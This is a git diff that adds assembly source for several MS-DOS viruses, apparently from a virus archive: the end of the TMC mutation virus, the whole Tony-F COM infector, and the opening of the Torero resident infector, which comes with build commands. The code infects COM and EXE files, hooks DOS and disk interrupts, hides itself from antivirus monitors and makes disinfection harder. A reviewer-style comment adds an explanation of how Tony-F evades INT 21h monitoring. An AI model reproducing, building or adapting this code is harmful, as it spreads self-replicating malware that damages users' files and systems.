+ + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of new_mcb_siz + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 04h ; Four bytes instruction + + mov [si],1000h ; Store new size in paragraphs + + db 02h ; Two bytes instruction + + mov al,00h ; COM executable + + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store executable status + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 03h ; Three bytes instruction + + mov ax,4202h ; Set current file position (EOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; DX = low-order word of offset f... + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + cmp ax,0e000h ; Filesize too large? + + db 01110111b+10000000b ; Above? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 03h ; Three bytes instruction + + add ax,100h ; AX = delta offset + + db 03h ; Three bytes instruction + + mov ds:[01h],ax ; Store delta offset + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + xor dx,dx ; Zero DX + + db 03h ; Three bytes instruction + + mov cx,1234h ; CX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... 
+ + db 02h ; Two bytes instruction + + xor dx,dx ; DX = low-order word of offset fr... + + db 02h ; Two bytes instruction + + int 21h + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 02h ; Two bytes instruction + + mov dx,di ; DX = offset of origin_code_ + + db 03h ; Three bytes instruction + + mov byte ptr [di],11101001b + + db 03h ; Three bytes instruction + + sub ax,03h ; AX = offset of virus within infe... + + db 03h ; Three bytes instruction + + mov [di+01h],ax ; Store offset of virus within inf... + + db 03h ; Three bytes instruction + + mov cx,03h ; Write three bytes + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 138eh ; Pointer to set_file_inf + db 11101111b ; End of block +set_file_inf db 11101110b ; Beginning of block + dw 138eh ; Block identification of set_file... 
+ db 03h ; Three bytes instruction + + mov ax,5701h ; Set file's date and time + + db 04h ; Four bytes instruction + + mov cx,ds:[1234h] ; CX = new time + + db 11101101b ; Data reference + dw 12ch ; Pointer to file_time + db 04h ; Four bytes instruction + + mov dx,ds:[1234h] ; DX = new date + + db 11101101b ; Data reference + dw 12dh ; Pointer to file_date + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fah ; Block identification of close_file + db 11101111b ; End of block +close_file db 11101110b ; Beginning of block + dw 0fah ; Block identification of close_file + db 02h ; Two bytes instruction + + mov ah,3eh ; Close file + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1771h ; Pointer to int24_store + db 11101111b ; End of block +int24_store db 11101110b ; Beginning of block + dw 1771h ; Block identification of int24_store + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 03h ; Three bytes instruction + + mov ax,2524h ; Set interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fbh ; Pointer to int21_exit + db 11101111b ; End of block +int21_exit db 11101110b ; Beginning of block + dw 0fbh ; Block identification of int21_exit + db 01h ; One byte instruction + + pop es ; Load ES from stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack + + db 01h ; One byte instruction + + pop di ; Load DI from stack + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop cx ; Load CX from stack + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + pop ax ; Load aX from stack + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0c9h ; Pointer to int21_jump + db 
11101111b ; End of block +int21_jump db 11101110b ; Beginning of block + dw 0c9h ; Block identification of int21_jump + db 05h+10h ; Five bytes data + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; address of interrupt 21h + db 11101111b ; End of block +infect_exe db 11101110b ; Beginning of block + dw 138dh ; Block identification of infect_exe + db 02h ; Two bytes instruction + + mov al,01h ; EXE executable + + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store executable status + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; CX = low-order word of offset fi... + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 02h ; Two bytes instruction + + mov ah,3fh ; Read from file + + db 03h ; Three bytes instruction + + mov cx,18h ; Read twenty-four bytes + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of exe_header + + db 11101101b ; Data reference + dw 138fh ; Pointer to exe_header + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of exe_header + + db 11101101b ; Data reference + dw 138fh ; Pointer to exe_header + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 04h ; Four bytes instruction + + cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...? + + db 01110100b+10000000b ; Equal? Jump to maximum_mem + dw 1399h ; Pointer to maximum_mem + db 03h ; Three bytes instruction + + mov ax,[si+04h] ; AX = total number of 512-byte pa... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... 
+ + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1399h ; Pointer to maximum_mem + db 11101111b ; End of block +maximum_mem db 11101110b ; Beginning of block + dw 1399h ; Block identification of maximum_mem + db 03h ; Three bytes instruction + + add ax,[si+0ch] ; Add maximum paragraphs to alloca... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store size of memory block in pa... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 03h ; Three bytes instruction + + mov ax,[si+0eh] ; AX = initial SS relative to star... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SS relative to sta... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + mov ax,[si+10h] ; AX = initial SP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SP + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 03h ; Three bytes instruction + + mov ax,[si+14h] ; AX = initial IP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial IP + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial_ip_ + db 03h ; Three bytes instruction + + mov ax,[si+16h] ; AX = initial CS relative to star... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial CS relative to sta... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + mov ax,14h ; AX = probability of storing inco... + + db 04h ; Four bytes instruction + + cmp ds:[1234h],ax ; Store incorrect IP? + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01110111b+10000000b ; Above? 
Jump to set_file_pos + dw 1775h ; Pointer to set_file_pos + db 01h ; One byte instruction + + push bp ; Save BP at stack + + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (DS) + + db 03h ; Three bytes instruction + + mov bp,40h ; Random number within sixty-four + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 01h ; One byte instruction + + pop bp ; Load BP from stack + + db 03h ; Three bytes instruction + + add ax,[si+14h] ; Add initial IP to random number ... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store incorrect IP + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1775h ; Pointer to set_file_pos + db 11101111b ; End of block +set_file_pos db 11101110b ; Beginning of block + dw 1775h ; Block identification of set_file... + db 03h ; Three bytes instruction + + mov ax,4202h ; Set current file position (EOF) + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; DX = high-order word of offset f... + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + cmp dx,06h ; Filesize too large? + + db 01110111b+10000000b ; Above? Jump to write_virus + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 03h ; Three bytes instruction + + mov cx,200h ; Divide by pages + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in pages + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 03h ; Three bytes instruction + + cmp [si+04h],ax ; Internal overlay? 
+ + db 01h ; One byte instruction + + pop dx ; Load DX from stack + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110101b+10000000b ; Not equal? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 01h ; One byte instruction + + push dx ; Save DX at stack + + db 05h ; Five bytes instruction + + mov [si+0ch],0ffffh ; Store maximum paragraphs to allo... + + db 05h ; Five bytes instruction + + mov [si+10h],7ffeh ; Store initial SP + + db 05h ; Five bytes instruction + + mov word ptr [si+14h],00h + + db 03h ; Three bytes instruction + + mov cx,10h ; Divide by paragraphs + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in paragraphs + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 01h ; One byte instruction + + inc ax ; Increase initial CS/SS relative ... + + db 03h ; Three bytes instruction + + mov [si+0eh],ax ; Store initial SS relative to sta... + + db 03h ; Three bytes instruction + + mov [si+16h],ax ; Store initial CS relative to sta... + + db 03h ; Three bytes instruction + + mov ax,[si+04h] ; AX = total number of 512-byte pa... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 03h ; Three bytes instruction + + add ax,[si+0ah] ; Add maximum paragraphs to alloca... + + db 02h ; Two bytes instruction + + mov di,ax ; DI = minimum paragraphs to alloc... 
+ + db 01h ; One byte instruction + + pop cx ; Load CX from stack (DX) + + db 01h ; One byte instruction + + pop dx ; Load DX from stack (AX) + + db 03h ; Three bytes instruction + + and dx,1111111111110000b + + db 03h ; Three bytes instruction + + add dx,10h ; DX = low-order word of offset fr... + + db 03h ; Three bytes instruction + + adc cx,00h ; CX = high-order word of offset f... + + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + add ax,1234h ; AX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 03h ; Three bytes instruction + + adc dx,00h ; Convert to 32-bit + + db 03h ; Three bytes instruction + + mov cx,200h ; Divide by pages + + db 02h ; Two bytes instruction + + div cx ; DX:AX = filesize in pages + + db 03h ; Three bytes instruction + + mov [si+02h],dx ; Store number of bytes in last 51... + + db 01h ; One byte instruction + + inc ax ; Increase total number of 512-byt... + + db 03h ; Three bytes instruction + + mov [si+04h],ax ; Store total number of 512-byte p... + + db 05h ; Five bytes instruction + + mov [si+0ah],800h ; Store minimum paragraphs of memo... + + db 01h ; One byte instruction + + inc ax ; Store total number of 512-byte p... + + db 02h ; Two bytes instruction + + mov cl,05h ; Divide by thirty-two + + db 02h ; Two bytes instruction + + shl ax,cl ; AX = total number of 512-byte pa... + + db 03h ; Three bytes instruction + + sub ax,[si+08h] ; Subtract header size in paragrap... + + db 03h ; Three bytes instruction + + add ax,[si+0ah] ; Add maximum paragraphs to alloca... 
+ + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 02h ; Two bytes instruction + + sub di,ax ; DI = additional minimum paragrap... + + db 01110110b+10000000b ; Below or equal? Jump to dont_add... + dw 1396h ; Pointer to dont_add_mem + db 03h ; Three bytes instruction + + add [si+0ah],di ; Add additional minimum paragraph... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1396h ; Pointer to dont_add_mem + db 11101111b ; End of block +dont_add_mem db 11101110b ; Beginning of block + dw 1396h ; Block identification of dont_add... + db 06h ; Six bytes instruction + + mov word ptr ds:[01h],00h + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + xor dx,dx ; Zero DX + + db 03h ; Three bytes instruction + + mov cx,1234h ; CX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor dx,dx ; DX = low-order word of offset f... + + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + mov dx,si ; DX = offset of exe_header + + db 03h ; Three bytes instruction + + mov cx,18h ; Write twenty-four bytes + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? 
Jump to close_file + dw 0fah ; Pointer to close_file + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 138eh ; Pointer to set_file_inf + db 11101111b ; End of block +int24_virus db 11101110b ; Beginning of block + dw 1770h ; Block identification of int24_virus + db 02h ; Two bytes instruction + + mov al,03h ; Fail system call in progress + + db 01h ; One byte instruction + + iret ; Interrupt return + + db 11101111b ; End of block +exe_header db 11101110b ; Beginning of block + dw 138fh ; Block identification of exe_header + db 18h+10h ; Twenty-four bytes data + db 18h dup(00h) ; EXE header + db 11101111b ; End of block +file_time db 11101110b ; Beginning of block + dw 12ch ; Block identification of file_time + db 02h+10h ; Two bytes data + dw 00h ; File time + db 11101111b ; End of block +file_date db 11101110b ; Beginning of block + dw 12dh ; Block identification of file_date + db 02h+10h ; Two bytes data + dw 00h ; File date + db 11101111b ; End of block +message db 11101110b ; Beginning of block + dw 2328h ; Block identification of message + db (message_end-messag_begin)+10h +messag_begin db 0dh,0ah + db 0dh,0ah + db ' TMC 1.0 by Ender from Slovakia ',0dh,0ah + db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah + db 'Dis is level 42.',0dh,0ah + db 'Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel',0dh,0ah + db 'Personal greetings: K. K., Dark Punisher',0dh,0ah + db 0dh,0ah +message_end: + db 11101111b ; End of block + db 00h ; End of table +code_end: +table_end: + +end code_begin diff --git a/MSDOS/Virus.MSDOS.Unknown.tony-f.asm b/MSDOS/Virus.MSDOS.Unknown.tony-f.asm new file mode 100644 index 00000000..f041139e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tony-f.asm 
@@ -0,0 +1,201 @@
+;------------------------------------------------------------------------------;
+; ;
+; Tony-F ;
+; ;
+; Tony_F , - ;
+; ;
+; ?*.COM, ? . ;
+; Tony-F , ;
+; ( 24h) ;
+; . ;
+; Tony-F 21h ;
+; 3, ;
+; . ;
+;------------------------------------------------------------------------------;
+
+; Turbo Assembler 2.0+
+
+ .model Tiny
+ .code
+
+
+VirLen = offset EndCode - offset Start ; .
+
+;-----------------------------------------------------------------------------;
+
+ Org 07Fh
+
+INT24 db ? ; 24h.
+
+
+ Org 0100h
+
+NewDTA db 15h dup (?) ; DTA.
+FAttr db ?
+FTime dw ?
+FDate dw ?
+FLen dw ?, ?
+FName db 0Dh dup (?)
+
+;-----------------------------------------------------------------------------;
+
+ Org 100h
+
+Start:
+ push ax ; AX.
+
+;...... 21h
+
+ mov ax,1203h
+ int 2Fh ; .
+
+ xor si,si ;
+Again: ; - 2h,3h 26h.
+ lodsw
+ cmp ax,3A2Eh
+ je NextByte
+ dec si
+ jnz Again
+ jmp Done
+NextByte:
+ lodsb
+ cmp al,26h
+ jne Again
+Found:
+ sub si,03
+
+ mov dx,si
+ mov ax,2503H ; 21h
+ Int 21h ; 3.
+
+ push cs ; DS.
+ pop ds
+
+;......
+
+ mov INT24,0CFh ; 24h - Iret
+ mov ax,2524h
+ mov dx,offset INT24
+ Int 3 ; 24h.
+
+
+ mov ax,cs
+ add ah,10h
+ mov es,ax ; ES = CS + 64 KBytes
+ mov si,offset Start
+ xor di,di
+ mov cx,si ; 64KBytes
+ rep movsb ; - .
+
+ mov dx,offset NewDTA ; DTA .
+ mov ah,1Ah
+ Int 3
+
+ mov ah,2Ah
+ Int 3 ; ,
+ add dl,'A' ;
+ mov AllCom ,dl ; .
+
+;...... .
+
+ mov dx, offset AllCom ; '?*.COM' .
+ mov cl,110B
+ mov ah,4Eh ; Find First.
+ Int 3
+ jc Done ;
+ ; .
+FindNext:
+ mov dx,offset Fname ; dx DTA.
+ mov ax,3D02h ; /.
+ Int 3
+
+ mov bx,ax ; .
+ push ds ; DS.
+ push es
+ pop ds ; DS = CS + 64 KBytes.
+
+ mov dx,VirLen ; DX = .
+ mov cx,-1 ; - DS:DX .
+ mov ah,3Fh ; ,
+ Int 3 ; .
+
+ ; (AX)
+ add ax,Virlen ; .
+ jc Close ; .
+
+ cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; ?
+ je Close
+
+ push ax ; .
+
+ xor cx,cx
+ xor dx,dx
+ mov ax,4200h ; (CX:DX)
+ Int 3 ; .
+
+ pop cx ; .
+ ; DX 0 Fn 42.
+ mov ah,40h ; DS:DX
+ Int 3 ; + .
+
+ mov cx,cs:FTime
+ mov dx,cs:FDate ;
+ mov ax,5701h ; DTA.
+ Int 3
+
+Close:
+ pop ds ; DS.
+
+ mov ah,3Eh ; .
+ Int 3
+
+ mov ah,4Fh
+ Int 3 ; Find Next,
+ jnc FindNext ;
+ ; .
+
+
+;....... .
+
+Done:
+ mov dx,80h
+ mov ah,1Ah
+ Int 3 ; DTA.
+
+
+ push es
+ mov ax,offset TransF -100h ;
+ push ax ; 64 KBytes -
+ RETF ; TransF.
+
+;........................................
+ ;
+Mark db 'Tony' ; .
+AllCom db '+' ;
+ db '*.COM',0 ;
+;.......................................; .
+
+TRansF:
+ push ds
+ pop es
+
+ pop ax ; AX.
+
+ mov si,offset EndCode ;
+ mov di,offset Start ; 100h .
+ push ds ;
+ push di ; .
+ mov cx,0FFF0h -102h -Virlen
+ rep movsb
+
+ RETF
+
+;-----------------------------------------------------------------------------;
+
+EndCode:
+ Ret ;
+
+;-----------------------------------------------------------------------------;
+
+End Start
+ 
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.torero.asm b/MSDOS/Virus.MSDOS.Unknown.torero.asm
new file mode 100644
index 00000000..5eee43ae
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.torero.asm
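Review bot: The explanatory comments in this file are mis-encoded — the original (presumably Cyrillic) text was stripped, leaving only punctuation such as `; Tony_F , - ;` — so the mechanism after `Start:` is undocumented in English. As I read it, `int 2Fh` with `ax=1203h` locates the DOS data segment, the loop at `Again:` scans it for the byte pattern `2E 3A 26` (which looks like the `cmp ah,cs:[...]` at the head of the kernel's INT 21h dispatcher — verify), and `mov ax,2503H / Int 21h` points INT 3 at that address so every later DOS call is issued as a one-byte `Int 3`. That matters for analysts because resident INT 21h hooks (monitors, behaviour blockers) never see those calls; I would add `; all DOS calls below go through INT 3, aimed at the kernel's INT 21h dispatcher - INT 21h hooks are bypassed` at `Found:`, and `; INT 24h is pointed at a CFh (IRET) byte written into the PSP at 7Fh, so critical errors are silently ignored` at `mov INT24,0CFh`.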
@@ -0,0 +1,570 @@
+;
+;
+; Torero
+; by Mister Sandman/29A
+;
+;
+;
+; Hoho... here you have a new coolio viral technique, especially dedicated
+; to those who think that everything on viruses was invented yet :) This
+; virus ain't a 'powerful' one; in fact, and as i decided to do in this
+; first issue as i hadn't many time, it's a simple infector just written
+; to show this new viral capability, never used before as far as i know.
+;
+; And what is this technique about?, you might ask. Ok... apart from DirII
+; and all its family, we don't know many viruses that store the original
+; header of infected files in other place than the viral code, right?
+;
+; AVV and i were making some researches and suddenly found ten free unused
+; bytes on the directory entry of each file... and this the place where my
+; virus stores the header of every file it infects :) In this way, the AV
+; companies must write some specific routines for disinfecting Torero...
+; this means that the cleaning of our virus is more difficult, which is
+; what we're looking for :)
+;
+; Anyway, as every viral technique, it has some pros and some cons... and
+; the cons consist on the next simple thingy: if someone copies, compress-
+; es, or manipulates an infected file, it will have a different directory
+; entry, and then it will be imposible to restore its original header.
+;
+; However, and as this is just a sample virus, i didn't pay much attention
+; to this kinda probabilities, and i just used an idea Wintermute gave me:
+; if the host doesn't find its original header, it will display a message
+; i'm sure you all know: 'This program requires Microsoft Windows.' :)
+;
+; As a last (but not least) feature in this virus, don't forget to have a
+; look at the infection mark, based on using the eigth attribute bit, al-
+; ways empty and unused until now. This is a specially good infection mark
+; for a virus, as it's very simple and doesn't get flagged because of in-
+; correct time stamp and all that shit. Besides, it makes things easier
+; for us when implementing stealth techniques, etc.
+;
+; About the name, i decided to call it 'Torero' because it's a spanish
+; word which means 'bullfighter', often used for telling someone that he
+; or what he did is cool, because toreros are supposed to have the biggest
+; nuts around :)
+;
+; Compiling instructions
+;
+; tasm /m torero.asm
+; tlink torero.obj
+; exe2bin torero.exe torero.com
+
+
+ .286
+torero segment byte public
+ assume cs:torero,ds:torero
+ org 0
+
+torero_start label byte
+torero_size equ torero_end-torero_start
+
+torero_entry: call delta_offset ; Get -offset in BP
+delta_offset: pop bp ; for l8r use
+ sub bp,offset delta_offset
+
+ mov ah,30h ; Get DOS version
+ int 21h
+
+ cmp bx,';)' ; Are we already
+ jne set_int_21h ; memory resident?
+
+ push cs ; Save CS for the host
+ mov bx,ds ; Don't lose DS
+ xor ax,ax ; Jump to the memory
+ mov ds,ax ; copy and restore
+ push word ptr ds:[21h*4+2] ; the host header
+ push offset check_host
+ mov ds,bx
+ retf
+
+set_int_21h: mov ax,es
+ dec ax
+ mov ds,ax ; Program's MCB segment
+ xor di,di
+
+ cmp byte ptr ds:[di],'Y' ; Is it a Z block?
+ jna set_int_21h
+
+ sub word ptr ds:[di+3],((torero_size/10h)+2)
+ sub word ptr ds:[di+12h],((torero_size/10h)+2)
+ add ax,word ptr ds:[di+3]
+ inc ax
+
+ mov ds,ax
+ mov byte ptr ds:[di],'Z' ; Mark block as Z
+ mov word ptr ds:[di+1],8 ; System memory
+ mov word ptr ds:[di+3],((torero_size/10h)+1)
+ mov word ptr ds:[di+8],4f44h ; Mark block as owned
+ mov word ptr ds:[di+0ah],0053h ; by DOS (444f53h,0)
+ inc ax
+
+ cld
+ push cs
+ pop ds
+ mov es,ax
+ mov cx,torero_size ; Copy virus to memory
+ mov si,bp
+ rep movsb
+
+ push es
+ push offset copy_vector ; Jump to the virus
+ retf ; copy in memory
+
+copy_vector: push ds
+ mov ds,cx
+ mov es,ax ; Save int 21h's
+ mov si,21h*4 ; original vector
+ lea di,old_int_21h
+ movsw
+ movsw
+
+ mov word ptr [si-4],offset new_int_21h
+ mov word ptr [si-2],ax ; Set ours
+
+ mov si,13h*4 ; Save int 13h's
+ lea di,old_int_13h ; original vector
+ movsw
+ movsw
+
+ mov word ptr [si-4],offset new_int_13h
+ mov word ptr [si-2],ax ; Set ours
+
+ mov ds,ax
+check_host: call open_host ; Open the host
+ call get_sft ; Get its SFT for our
+ call check_mark ; infection mark
+ jb messed_up ; File is messed up :-(
+
+ call read_entry ; Read the entry
+ call point_entry ; Point to the header
+ cmp word ptr ds:[si],0 ; Is it empty?
+ jne restore_header
+
+ cmp word ptr ds:[si+2],0 ; Empty too? huh :-(
+ je messed_up ; File is messed up
+
+restore_header: pop es ; ES=host segment
+ push es ; Store it in the stack
+ mov di,100h ; file header from the
+ push di ; Store the IP
+ movsw ; DS:SI points to the
+ movsb ; original header, in
+ ; the directory entry
+ push es
+ pop ds ; DS=ES
+ retf ; Jump to the host
+
+messed_up: mov ah,3eh ; File is messed up...
+ int 21h ; close it and show
+ call emergency ; the Windows message :)
+
+; Ĵ Torero's int 13h handler
+
+new_int_13h: cmp ah,3
+ je sector_write ; Sector write?
+
+ db 0eah ; Jump back to the
+old_int_13h dw ?,? ; original int 13h
+
+sector_write: push ax bx cx
+ pushf
+
+ xor ah,ah ; Calculate how many
+ mov cl,4 ; files we must test
+ shl ax,cl ; by multiplying the
+ mov cx,ax ; sector number with
+ or cx,cx ; 10h (entries)
+ je bucle_end
+
+int_13h_bucle: cmp byte ptr es:[bx+9],'O' ; -O-?
+ jne more_files
+
+ mov al,byte ptr es:[bx+9]
+ sub al,2
+ cmp al,byte ptr es:[bx+0ah] ; -OM?
+ jne more_files
+ cmp al,'M' ; Then it's a COM
+ je subtract
+
+more_files: add bx,20h ; Look for more files
+ loop int_13h_bucle ; Look'n'loop :)
+
+bucle_end: popf
+ pop cx bx ax ; End of the bucle
+ ; Call the original
+ call int_13h ; int 13h and jump
+xor_and_jump: xor ax,ax ; to the original int
+
+return_to_int: push bp ax
+ pushf
+
+ pop ax ; Return to the
+ mov bp,sp ; original int 13h
+ mov word ptr ss:[bp+8],ax
+
+ pop ax bp
+ retf 2
+
+subtract: cmp byte ptr es:[bx],0e5h ; A deleted file...
+ je more_files ; bah, skip it
+
+ cmp byte ptr es:[bx+0bh],80h ; Infected?
+ jb more_files
+
+ cmp word ptr es:[bx+0ch],0 ; Is the header field
+ jne more_files ; empty?
+
+ cmp word ptr es:[bx+0eh],0
+ jne more_files
+
+ mov ax,word ptr cs:[header_store] ; Ok, let's copy
+ mov word ptr es:[bx+0ch],ax ; the original file
+ ; header to the
+ mov ax,word ptr cs:[header_store+2] ; directory entry
+ mov word ptr es:[bx+0eh],ax
+ jmp more_files
+
+; Ĵ Torero's signature
+
+signature db 0dh,0ah,'[Torero :-) by Mister Sandman/29A]',0dh,0ah
+
+; Ĵ Torero's int 21h handler
+
+new_int_21h: cli
+ cmp ah,6ch ; This code is stolen
+ ja real_checks ; from the original
+ ; DOS kernel handler,
+ cmp ah,33h ; so they won't catch
+ jb real_checks ; us if they don't go
+ jz fake_stuff ; further thru the
+ ; rest of the code of
+ cmp ah,64h ; the handler... thanx
+ ja fake_stuff ; to Qark for this
+ jz real_checks ; cool idea :)
+
+ cmp ah,51h
+ jz real_checks
+
+ cmp ah,62h
+ jz fake_stuff
+
+ cmp ah,50h
+ jz real_checks
+
+fake_stuff: push ax bx cx ; Shit, shit, shit,
+ nop ; shit... skip it
+ pop cx bx ax
+
+real_checks: cmp ah,30h
+ jne opening ; (get DOS version)?
+
+ mov bx,';)' ; Return the smiley :)
+ iret
+
+opening: cmp ah,3dh ; File opening?
+ je file_open
+
+ cmp ax,4301h ; Attribute change?
+ je new_attribute
+
+ cmp ax,6c00h ; Extended open?
+ je file_open
+
+jmp_int_21h db 0eah ; Jump to the original
+old_int_21h dw ?,? ; int 21h address
+
+; Ĵ File open
+
+file_open: call infect_file ; Infection routine
+ jmp dword ptr cs:[old_int_21h] ; Jump back to int 21h
+
+; Ĵ New attribute
+
+new_attribute: mov ah,30h ; Change 43h for 30h
+ iret ; so it will do nothing
+
+; Ĵ Infection routine
+
+infect_file: pushf
+ push ax bx cx dx ; Push registers, flags
+ push si di ds es ; and all that shit
+
+ call set_int_24h ; Set int 24h
+
+ cmp ah,6ch ; Extended open?
+ jne normal_open
+
+ mov dx,si ; Fix it to DS:DX
+normal_open: mov ax,3d00h ; Open the file
+ call int_21h
+ xchg bx,ax ; File handle in BX
+
+ push cs ; CS=DS
+ pop ds
+
+ call get_sft ; Get file's SFT
+ call check_mark ; Already infected?
+ jae close_and_pop
+
+ mov byte ptr es:[di+2],2 ; Open mode=r/w
+ mov ax,word ptr es:[di+28h] ; Check the extension
+ cmp ax,'OC' ; of our victim
+ jne close_and_pop
+
+ mov byte ptr cs:[infecting],1
